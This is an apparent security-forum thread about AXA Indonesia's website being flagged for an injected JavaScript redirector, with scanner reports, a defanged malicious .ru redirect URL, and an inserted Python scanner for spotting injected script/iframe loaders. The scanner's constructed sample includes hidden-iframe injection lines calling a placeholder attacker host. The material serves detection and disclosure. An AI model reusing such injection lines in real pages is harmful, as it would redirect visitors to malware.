AXA Financial Website was injected with JS:Illredir-CB [Trj]

Dear All,

I just got information from my friend that one of the biggest financial providers, AXA Financial, had their website injected with JS:Illredir-CB [Trj].
avast! detected that 3 locations were infected:

avast! [YANTOCHIANG-PC]: File “http://wxw.axa.co.id/DropDownMenuX.js” is infected by “JS:Illredir-CB [Trj]” virus.
“%3” task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File “http://wxw.axa.co.id/ie5.js” is infected by “JS:Illredir-CB [Trj]” virus.
“%3” task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File “http://wxw.axa.co.id/” is infected by “JS:Illredir-CB [Trj]” virus.
“%3” task used
Version of current VPS file is 100607-2, 06/08/2010

And from the summary of the website scanning tool, this website got the suspicious category:

http://www.unmaskparasites.com/security-report/

I need to know the exact location where their HTML script was injected.

This page seems to be 1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

VirusTotal - axa.co.id.htm - 8/41
http://www.virustotal.com/analisis/40f5bf00aacfa11860323a34260abea575772d3d292afaafe53d589f1f65337d-1275988821

Hi Pondus,

Yes, you are right, I just would like to know which part of this website was injected with the script.

cheers,

Not sure, but DavidR or Polonus will tell you when they arrive.

Hi Pondus,

Thanks for your kind advice.

I need this because if I can contact their web administrator, it would be helpful for them.

Since their core business is financial transactions, I am afraid it would be harmful for other clients related to AXA Financial.

cheers,

According to Wepawet, no harmful script was found on this website:

http://wepawet.iseclab.org/view.php?hash=040f6e2c7a680c8297f10b249fd9a01d&t=1275980714&type=js

Definitely a malware redirector. Wepawet even finds the Russian link, but it’s down.

Hi Kubejc,

Thanks for your kind information and advice.

cheers,

Hi YantoChiang,

Make the links in your first posting so they cannot be clicked through; suspicious links should be written with wxw or htxp so the curious cannot click them and get themselves infested with malware.

If you analyze it there, as kubecj pointed out to us, you would get a drop-down from here: wXw.axa.co.id/DropDownMenuX.js
to a CreateElement here: hxtp://surechip.ru:8080/google.com/google.co.ve/digitalpoint.com.php
Empty source - could not connect to the site?

polonus
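The chain polonus describes above (a legitimate menu script that, at its tail, creates a script or iframe element whose src points to an outside host on a non-standard port) is exactly what a site owner can look for when they ask "which part of my page was injected". The script below is an added illustration, not code from this thread or from any of the tools linked in it. It pairs each document.createElement('script'|'iframe') with the later .src assignment to the same variable, also catches document.write'd script/iframe tags, and reports the line number, the URL and why it was flagged. The sample menu file and HTML page are constructed, the host attacker.example is a placeholder, and the TRUSTED_HOSTS set is an assumption standing in for the site's own domains.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a benign menu script with an injected loader appended at the end.
# (Illustrative only; this is not the code that was found on the site in the thread.)
SAMPLE_JS = """\
// DropDownMenuX.js (constructed sample)
function showMenu(id) {
  var m = document.getElementById(id);
  m.style.display = 'block';
}
var jq = document.createElement('script');
jq.src = 'http://www.example-cdn.com/jquery.min.js';
document.getElementsByTagName('head')[0].appendChild(jq);
var x = document.createElement('iframe');
x.src = 'http://attacker.example:8080/google.com/page.php';
x.style.width = '1px'; x.style.height = '1px';
document.body.appendChild(x);
document.write("<iframe src='http://attacker.example/frame.html' width=1 height=1></iframe>");
"""

# Constructed sample page: two external includes plus one inline script block.
SAMPLE_HTML = """\
<html><head>
<script src="/DropDownMenuX.js"></script>
<script src="http://www.axa.co.id/ie5.js"></script>
</head><body>
<script>
var x = document.createElement('iframe');
x.src = 'http://attacker.example:8080/google.com/page.php';
document.body.appendChild(x);
</script>
</body></html>
"""

# Assumption: hosts the site legitimately loads code from. Anything else is reported.
TRUSTED_HOSTS = {"www.axa.co.id", "www.example-cdn.com"}

CREATE_RE = re.compile(r"""(?:var\s+)?(\w+)\s*=\s*document\.createElement\s*\(\s*['"](script|iframe)['"]\s*\)""", re.I)
SRC_RE = re.compile(r"""(\w+)\.src\s*=\s*['"]([^'"]+)['"]""", re.I)
WRITE_RE = re.compile(r"""document\.write\s*\(.*?<(script|iframe)[^>]*?src\s*=\s*\\?['"]([^'"\\]+)""", re.I)
SCRIPT_BLOCK_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)


def classify(url, trusted_hosts=TRUSTED_HOSTS):
    """Return a reason string if the URL loads from outside the trusted hosts, else None."""
    p = urlparse(url)
    if p.hostname is None:          # relative URL: same origin, nothing to flag
        return None
    reasons = []
    if p.hostname.lower() not in trusted_hosts:
        reasons.append("external host")
    if p.port not in (None, 80, 443):
        reasons.append("non-standard port %d" % p.port)
    return ", ".join(reasons) or None


def find_dynamic_loaders(js_text, trusted_hosts=TRUSTED_HOSTS):
    """Scan JavaScript for created script/iframe elements or document.write'd tags with untrusted src."""
    findings = []
    created = {}                    # variable name -> (element type, line created)
    for lineno, line in enumerate(js_text.splitlines(), 1):
        for m in CREATE_RE.finditer(line):
            created[m.group(1)] = (m.group(2).lower(), lineno)
        for m in SRC_RE.finditer(line):
            var, url = m.group(1), m.group(2)
            if var in created:
                kind, created_at = created[var]
                reason = classify(url, trusted_hosts)
                if reason:
                    findings.append({"line": lineno, "element": kind, "url": url,
                                     "reason": reason, "created_at": created_at})
        for m in WRITE_RE.finditer(line):
            reason = classify(m.group(2), trusted_hosts)
            if reason:
                findings.append({"line": lineno, "element": m.group(1).lower(), "url": m.group(2),
                                 "reason": reason, "created_at": lineno})
    return findings


def scan_html(html, trusted_hosts=TRUSTED_HOSTS):
    """Report untrusted <script src> includes and inline scripts that load untrusted content, with page line numbers."""
    report = []
    for i, m in enumerate(SCRIPT_BLOCK_RE.finditer(html), 1):
        attrs, body = m.group(1), m.group(2)
        start_line = html.count("\n", 0, m.start()) + 1
        src = re.search(r"""src\s*=\s*['"]([^'"]+)['"]""", attrs, re.I)
        if src:
            reason = classify(src.group(1), trusted_hosts)
            if reason:
                report.append({"script": i, "line": start_line, "url": src.group(1), "reason": reason})
        else:
            for f in find_dynamic_loaders(body, trusted_hosts):
                report.append({"script": i, "line": start_line + f["line"] - 1,
                               "url": f["url"], "reason": f["reason"]})
    return report


if __name__ == "__main__":
    for f in find_dynamic_loaders(SAMPLE_JS):
        print("JS line %(line)d: %(element)s created at line %(created_at)d loads %(url)s (%(reason)s)" % f)
    for r in scan_html(SAMPLE_HTML):
        print("HTML script #%(script)d at line %(line)d loads %(url)s (%(reason)s)" % r)
```

Run it against a saved copy of the page and of each included .js file rather than against the live site, so nothing is fetched from the injected host. Obfuscated injections (split strings, unescape(), eval()) will not match these patterns; for those the tools linked earlier in the thread, which actually execute the script, are the better choice.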

Hi Polonus,

I am sorry for the inconvenience caused, but I already fixed it.

By the way, do you know how to trace the location of those scripts?

Hi Yanto.Chiang,

I PM-ed you with extensive instructions on how to do this safely and securely.
Good hunt,

polonus